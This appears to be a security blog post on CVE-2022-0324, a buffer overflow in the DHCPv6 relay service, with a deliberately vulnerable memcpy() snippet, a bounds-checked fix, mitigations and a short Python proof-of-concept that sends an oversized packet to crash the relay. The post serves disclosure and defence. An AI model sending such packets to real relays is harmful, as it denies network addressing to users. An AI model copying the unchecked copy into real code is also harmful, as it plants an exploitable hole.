Recently, a significant security vulnerability—CVE-2022-0324—was discovered in the DHCPv6 relay (dhcp6relay) service. If you’re using DHCPv6 relay in your network, particularly inside dockerized environments, keep reading. This post breaks down what went wrong, how the vulnerability can be exploited, and what you must do to stay secure.

What Is CVE-2022-0324?

_CVE-2022-0324_ is a buffer overflow vulnerability in the way the dhcp6relay process parses incoming DHCPv6 packets. A remote attacker can craft a malicious packet and trigger an out-of-bounds memory write, causing the service to crash. This attack vector is especially problematic because dhcp6relay is a critical process that, when crashed, can halt DHCP relay functions or even take down the containing docker container.

This vulnerability was discovered by Eugene Lim of GovTech Singapore.

The Root Cause: memcpy() in DHCPv6 Packet Parsing

The issue lies in how dhcp6relay handles certain DHCPv6 packets. Specifically, when parsing incoming packets, dhcp6relay uses the memcpy() function to copy packet content into a buffer. Unfortunately, it does not properly check if the incoming packet is larger than the allocated buffer, resulting in a classic buffer overflow scenario.

Simplified Vulnerable Code Snippet

#include <string.h>

void relay_packet(const unsigned char *packet)
{
    char relay_buffer[512];                        // fixed-size stack buffer
    int packet_len = get_packet_length(packet);    // length taken from the packet itself, could be > 512

    // Vulnerable call: doesn't check if packet_len > sizeof(relay_buffer)!
    memcpy(relay_buffer, packet, packet_len);
}

If a remote attacker sends a specially crafted packet with a size larger than 512 bytes (or whatever the buffer is sized to handle), the memcpy() call would write past the end of the buffer. This causes a buffer overflow, which can overwrite adjacent memory and crash the process.
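To make the fix concrete, here is an added example (written for this post, not dhcp6relay's own code) that puts the missing check in place: the wire-supplied length is compared with the real size of the destination before memcpy(), and the DHCPv6 option list is then walked with the same discipline so that a lying option length is rejected rather than read past the buffer. The 512-byte buffer size, the function names and the three sample packets are constructed for illustration; the relay-forward header layout and the 2-byte code / 2-byte length option format are those of RFC 8415.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Added example for this post; not dhcp6relay's own code. Buffer size,
   function names and sample packets are constructed for illustration. */

#define RELAY_BUF_SIZE 512
/* RFC 8415 relay-forward header: msg-type(1) hop-count(1) link-addr(16) peer-addr(16) */
#define DHCPV6_RELAY_HDR_LEN 34
#define DHCPV6_RELAY_FORW 12
#define DHCPV6_OPT_RELAY_MSG 9

/* The fix pattern: compare the length taken from the wire with the real
   size of the destination before memcpy(). Returns bytes copied, or -1 if
   the packet does not fit. This is the check the vulnerable snippet omits. */
int relay_copy_checked(char *dst, size_t dst_size,
                       const uint8_t *packet, size_t packet_len)
{
    if (dst == NULL || packet == NULL) return -1;
    if (packet_len > dst_size) return -1;        /* would overflow: reject, do not copy */
    memcpy(dst, packet, packet_len);
    return (int)packet_len;
}

/* Walk the DHCPv6 option list (2-byte code, 2-byte length, data) and count
   options. Returns -1 if an option header is truncated or a declared
   length runs past the end of the buffer. */
int count_dhcpv6_options(const uint8_t *opts, size_t opts_len)
{
    size_t off = 0;
    int count = 0;
    while (off < opts_len) {
        if (opts_len - off < 4) return -1;               /* truncated option header */
        uint16_t len = (uint16_t)((opts[off + 2] << 8) | opts[off + 3]);
        off += 4;
        if (len > opts_len - off) return -1;             /* option data overruns buffer */
        off += len;
        count++;
    }
    return count;
}

/* Process one relay-forward message: bounded copy, header length check,
   then a bounds-checked option walk. Returns the option count or -1. */
int relay_process(const uint8_t *packet, size_t packet_len)
{
    char relay_buffer[RELAY_BUF_SIZE];
    int copied = relay_copy_checked(relay_buffer, sizeof relay_buffer, packet, packet_len);
    if (copied < 0) return -1;                               /* oversized: dropped, not overflowed */
    if ((size_t)copied < DHCPV6_RELAY_HDR_LEN) return -1;    /* too short to carry a relay header */
    if ((uint8_t)relay_buffer[0] != DHCPV6_RELAY_FORW) return -1;
    return count_dhcpv6_options((const uint8_t *)relay_buffer + DHCPV6_RELAY_HDR_LEN,
                                (size_t)copied - DHCPV6_RELAY_HDR_LEN);
}

/* Constructed sample: a minimal RELAY-FORW carrying one 4-byte Relay Message option. */
int demo_well_formed(void)
{
    uint8_t pkt[DHCPV6_RELAY_HDR_LEN + 8] = {0};
    pkt[0] = DHCPV6_RELAY_FORW;
    pkt[DHCPV6_RELAY_HDR_LEN + 1] = DHCPV6_OPT_RELAY_MSG;  /* option code 9 */
    pkt[DHCPV6_RELAY_HDR_LEN + 3] = 4;                     /* option length 4 */
    return relay_process(pkt, sizeof pkt);                 /* 1 option */
}

/* Constructed sample: the post's 1024-byte oversized packet. */
int demo_oversized(void)
{
    uint8_t pkt[1024] = {0};
    pkt[0] = DHCPV6_RELAY_FORW;
    return relay_process(pkt, sizeof pkt);                 /* -1: rejected before memcpy */
}

/* Constructed sample: an option claiming 200 bytes of data when only 4 follow. */
int demo_lying_option_length(void)
{
    uint8_t pkt[DHCPV6_RELAY_HDR_LEN + 8] = {0};
    pkt[0] = DHCPV6_RELAY_FORW;
    pkt[DHCPV6_RELAY_HDR_LEN + 1] = DHCPV6_OPT_RELAY_MSG;
    pkt[DHCPV6_RELAY_HDR_LEN + 3] = 200;
    return relay_process(pkt, sizeof pkt);                 /* -1: length check fails */
}

int main(void)
{
    printf("well-formed: %d, oversized: %d, lying length: %d\n",
           demo_well_formed(), demo_oversized(), demo_lying_option_length());
    return 0;
}
```

The point of the second function is that fixing the outer memcpy() alone is not enough: every length a DHCPv6 relay reads from the packet (the option-len fields inside the message as well as the packet length itself) has to be checked against what is actually present before it drives a copy or a pointer advance.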

What Can an Attacker Do?

- Remote Crash (DoS): An attacker on the network can send a single, oversized DHCPv6 packet to the relay. This will trigger the buffer overflow, crashing the dhcp6relay process and possibly the entire DHCP relay docker container. Result: network clients lose the ability to get IPv6 addresses via relay.
- Potential for Remote Code Execution: While there’s no public exploit for remote code execution at the moment, buffer overflows of this type have historically been used as a stepping stone for gaining further control over processes or even containers.

Proof-of-Concept Exploit (for testing in a safe lab!)

*Warning: Only use this in a controlled testing environment.*

import socket

# DHCPv6 UDP port
DHCPV6_PORT = 547

# Oversized DHCPv6 packet (example)
packet = b'\x00' * 1024  # 1024 bytes (vulnerable buffer is only 512 bytes)

# Send malicious packet
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
s.sendto(packet, ("fe80::1", DHCPV6_PORT))
print("Malicious packet sent")

This script simply sends an oversized packet to the DHCPv6 relay process, which may cause it to crash if it’s vulnerable.

Impact on Real-world Networks

- Denial of Service: DHCPv6 relay agents are core infrastructure. If they go down, new devices can’t join the network, and dynamic network addressing may cease to work.
- Container Disruption: If dhcp6relay is running inside a docker container, a successful attack can shut down the entire container, affecting interconnected services.

Mitigation and Patch

1. Upgrade: The maintainers of dhcp6relay have released patched versions. Always update to the latest release.
2. Network Segmentation: Block DHCPv6 packets from untrusted networks so they cannot reach your relay; only the segments the relay serves should be able to send to it.

References and Further Reading

- CVE-2022-0324 in the NVD
- ISC DHCP Project Home
- DHCPv6 Relay Agent Docker Documentation

Conclusion

CVE-2022-0324 is a stark reminder that even basic packet handling functions can introduce severe vulnerabilities if not implemented with strict safety checks. DHCPv6 relay is core infrastructure—take this vulnerability seriously, update your systems, and stay safe.

Timeline

Published on: 11/14/2022 17:15:00 UTC
Last modified on: 11/17/2022 23:16:00 UTC